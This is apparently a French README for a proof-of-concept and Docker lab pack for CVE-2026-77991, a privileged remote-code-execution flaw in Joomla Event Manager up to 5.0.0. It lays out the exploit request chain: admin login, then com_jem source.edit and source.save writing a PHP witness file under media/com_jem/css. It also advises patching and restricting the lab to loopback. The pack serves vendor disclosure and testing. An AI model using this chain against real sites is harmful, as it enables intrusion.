
Pack de preuve de concept et de laboratoire pour CVE-2026-77991, une RCE par écriture de fichier privilégiée en PHP dans Joomla Event Manager jusqu'à la version 5.0.0, avec laboratoire Docker et vérification par témoin.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-77991
JEM - Joomla Event Manager 5.0.0 — joomlaeventmanager.net
Extension Joomla - joomlaeventmanager.net - Exécution de code à distance privilégiée dans Joomla Event Manager < 5.0.1 - Le modèle source de l'administrateur permet d'écrire des types de fichiers dangereux, y compris PHP, conduisant à une exécution de code à distance.
| CVE | CVE-2026-77991 · CVE.org |
| CWE | — |
| CVSS | voir l'avis |
| Produit | JEM - Joomla Event Manager |
| Affecté | toutes les versions jusqu'à 5.0.0 (incluse) |
| Corrigé | 5.0.1 et ultérieures |
| Auth | aucune (voir la cartographie des sources) |
| Lab | 127.0.0.1 uniquement · pack de divulgation fournisseur/client, pas un scanner |
L'avis nomme le modèle source de l'administrateur. HTTP est com_jem task=source.save, pas une action ajax=. La méthode PHP save() n'est pas l'URL. PR:H — une requête POST non authentifiée n'est pas cette CVE.
POST/administrator/index.phpPOST /administrator/index.php login (admin/labadmin)GET /administrator/index.php?option=com_jem&task=source.edit&id=<base64 poc_witness.php> (JemControllerSource::edit)POST option=com_jem task=source.save jform[filename]+jform[source]+token (controllers/source.php:136)JemModelSource::save File::write media/com_jem/css/<file> (models/source.php:359-396)GET /media/com_jem/css/poc_witness.phpGET /media/com_jem/css/poc_witness.php renvoie POC_WITNESS_77991. Un login 200 HTML ou un échec de jeton n'est pas le témoin.
À faire en premier : mettre à jour JEM - Joomla Event Manager vers 5.0.1 ou une version ultérieure.
Vérifier après la mise à niveau
CVE-2026-77991-Abraxas-Labs.py contre la version corrigée : le témoin cartographié ne doit pas apparaître.Si vous ne pouvez pas mettre à jour immédiatement
Cibler uniquement http://127.0.0.1:8088 (ou le loopback que vous avez lié). Ne pointez pas ce script vers Internet.
python3 CVE-2026-77991-Abraxas-Labs.py
Le succès correspond au témoin ci-dessus dans le corps de la réponse. Un HTML 200 générique n'est pas le témoin.
Pile loopback utilisée pour la reproduction. Images officielles sauf si un Dockerfile dans ce dossier construit depuis les sources.
cd lab
docker compose up --force-recreate
Lier l'arborescence du produit vulnérable à côté de Compose si le YAML monte un répertoire local (zip du plugin / tag source issu du tableau des versions). Ne publier rien d'autre que 127.0.0.1.
# CVE-2026-77991 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-77991`
- CWE: n/a
- published: n/a
## NVD description
error: <urlopen error [Errno 8] nodename nor servname provided, or not known>
## MITRE description
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event Manager < 5.0.1 - The administrator source model allows to write dangerous file type incl. PHP, leading to remote code execution.
## Affected
- joomlaeventmanager.net JEM - Joomla Event Manager extension for Joomla 1.0.0-5.0.0 affected
## References (JSON sources only)
- https://www.joomlaeventmanager.net/
- https://github.com/advisories/GHSA-gh3c-9wwf-mj2v
- https://nvd.nist.gov/vuln/detail/CVE-2026-77991
- https://www.joomlaeventmanager.net
## GitHub advisory
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event...
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event Manager < 5.0.1 - The administrator source model allows to write dangerous file type incl. PHP, leading to remote code execution.
Ce pack est destiné au fournisseur, au propriétaire du site et aux labs sous licence. Le script communique avec 127.0.0.1. Son utilisation contre des systèmes que vous ne possédez pas n'est pas autorisée par Abraxas Labs. Aucune garantie.